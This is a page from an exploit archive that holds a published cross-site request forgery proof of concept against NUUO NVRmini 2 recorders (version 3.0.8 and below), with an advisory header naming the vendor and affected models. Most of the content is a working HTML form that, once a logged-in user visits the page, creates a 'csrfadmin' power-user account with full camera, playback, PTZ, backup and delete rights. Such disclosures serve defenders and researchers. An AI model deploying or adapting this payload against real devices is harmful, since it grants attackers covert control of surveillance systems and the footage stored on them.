NUUO 3.0.8 Add Admin Cross Site Request Forgery

NUUO 3.0.8 Add Admin Cross Site Request Forgery: Posted Aug 6, 2016; Authored by LiquidWorm | Site zeroscience.mk; NUUO versions 3.0.8 and below add administrator cross site request forgery exploit.; tags | exploit, csrf; SHA-256 | 3ff69f9197c891e79d9ceed13705b1137a72ee07d9fb46755ec772aa3b00be51; Download | Favorite | View

NUUO 3.0.8 Add Admin Cross Site Request Forgery

i>>?<!--

NUUO CSRF Add Admin Exploit


Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)

Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.

Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can be
exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.


Tested on: GNU/Linux 3.0.8 (armv7l)
           GNU/Linux 2.6.31.8 (armv5tel)
           lighttpd/1.4.28
           PHP/5.5.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5349
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5349.php


14.01.2016

-->


<!-- 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -->
<html>
  <body>
    <form action="http://10.0.0.17/users_xml.php">
      <input type="hidden" name="_password2" value="admin" />
      <input type="hidden" name="addusername" value="csrfadmin" />
      <input type="hidden" name="password" value="admin" />
      <input type="hidden" name="cmd" value="adduser" />
      <input type="hidden" name="group" value="poweruser" />
      <input type="hidden" name="displaygroup" value="power user" />
      <input type="hidden" name="magic" value="574" />
      <input type="hidden" name="liveacc" value="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" />
      <input type="hidden" name="pbacc" value="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" />
      <input type="hidden" name="ptzacc" value="1" />
      <input type="hidden" name="ioacc" value="1" />
      <input type="hidden" name="backupacc" value="1" />
      <input type="hidden" name="deleteacc" value="1" />
      <input type="hidden" name="emapeacc" value="1" />
      <input type="hidden" name="remotalkacc" value="1" />
      <input type="hidden" name="logacc" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Top Authors In Last 30 Days

Red Hat 222 files
indoushka 140 files
Ubuntu 93 files
Gentoo 33 files
Debian 27 files
Jasper Nota 25 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Jann Horn 10 files
Google Security Research 10 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,110)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,919)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,636)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,782)
UNIX (9,441)
UnixWare (187)
Windows (6,677)
Other

NUUO 3.0.8 Add Admin Cross Site Request Forgery

NUUO 3.0.8 Add Admin Cross Site Request Forgery

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

NUUO 3.0.8 Add Admin Cross Site Request Forgery

Share This

NUUO 3.0.8 Add Admin Cross Site Request Forgery

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems